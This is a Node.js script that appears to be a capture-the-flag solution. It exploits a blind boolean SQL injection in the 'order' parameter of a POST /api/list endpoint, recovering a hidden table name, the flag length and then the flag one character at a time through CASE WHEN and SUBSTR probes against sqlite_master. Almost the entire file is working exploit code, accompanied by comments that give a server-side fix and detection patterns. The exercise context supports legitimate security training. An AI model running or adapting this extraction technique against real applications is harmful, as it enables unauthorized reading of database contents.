solve.js
#!/usr/bin/env node
// Target origin comes from the first CLI argument (host or host:port); the
// scheme is always plain http.
const BASE_URL = `http://${process.argv[2]}`;

// Alphabet tried, in this order, for every character position: digits, lower
// and upper ASCII letters, then the few symbols that appear in the flag format.
const CHARS = [
  '0123456789',
  'abcdefghijklmnopqrstuvwxyz',
  'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
  '!$?@_{}',
].join('');
/**
 * Boolean oracle: one HTTP POST to `/api/list` per call.
 *
 * The request's `order` field is built as `CASE WHEN <payload> THEN id ELSE count END`;
 * the endpoint presumably places that value unescaped into an ORDER BY clause
 * (not visible here — inferred from the fact that this works at all). Whether the
 * first returned row has `id === 1` then reflects the truth of `payload`.
 *
 * Defender notes: the server-side fix is to never splice `order` into SQL — map
 * it to an allow-listed column name instead. Detection: repeated POSTs to
 * `/api/list` whose `order` contains `CASE WHEN`, `sqlite_master` or `SUBSTR(`.
 *
 * @param {string} payload - SQL boolean expression to evaluate server-side
 * @returns {Promise<boolean>} true when the first row's id is 1
 */
const oracle = async (payload) => {
  const sortExpression = `(CASE WHEN ${payload} THEN id ELSE count END)`;
  const response = await fetch(`${BASE_URL}/api/list`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ order: sortExpression }),
  });
  const rows = await response.json();
  // No status or shape check: an empty body makes `rows[0]` undefined and this throws.
  return rows[0].id === 1;
};
/**
 * Drives the oracle in three phases, each recovering data one character at a time:
 *   1. the name of the table matching `flag_%` (assumed to be exactly 15 characters),
 *   2. the length of the `flag` column in that table,
 *   3. the flag body between the fixed `HTB{` prefix and the closing `}`.
 *
 * Every probe is one request, so a run costs up to |CHARS| requests per recovered
 * character — a burst on `/api/list` that request logging or rate limiting would
 * make visible. Note the loops only terminate if every character is in CHARS and
 * the assumed lengths hold; otherwise they spin indefinitely.
 */
const main = async () => {
  // Phase 1: table name, starting from the known prefix.
  let tableName = 'flag_';
  while (tableName.length !== 15) {
    for (const ch of CHARS) {
      const probe = `(SELECT SUBSTR(tbl_name, ${tableName.length + 1}, 1) FROM sqlite_master WHERE tbl_name LIKE 'flag_%') = '${ch}'`;
      if (await oracle(probe)) {
        tableName += ch;
        break;
      }
    }
  }
  console.log('Flag table name:', tableName);

  // Phase 2: flag length, counting up until the inequality probe is false.
  let flagLength = 1;
  for (;;) {
    const differs = await oracle(`(SELECT LENGTH(flag) FROM ${tableName}) != ${flagLength}`);
    if (!differs) break;
    flagLength += 1;
  }
  console.log(`Flag length: ${flagLength}`);

  // Phase 3: flag body; the closing brace is appended rather than probed.
  let flag = 'HTB{';
  while (flag.length !== flagLength - 1) {
    for (const ch of CHARS) {
      const probe = `(SELECT SUBSTR(flag, ${flag.length + 1}, 1) FROM ${tableName}) = '${ch}'`;
      if (await oracle(probe)) {
        flag += ch;
        break;
      }
    }
  }
  flag += '}';
  console.log('Flag:', flag);
};
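// Report a rejected run (failed fetch, non-JSON body, empty result set) instead of
// leaving the promise floating, which would only yield an unhandled-rejection warning.
main().catch((err) => {
  console.error(err);
  process.exitCode = 1;
});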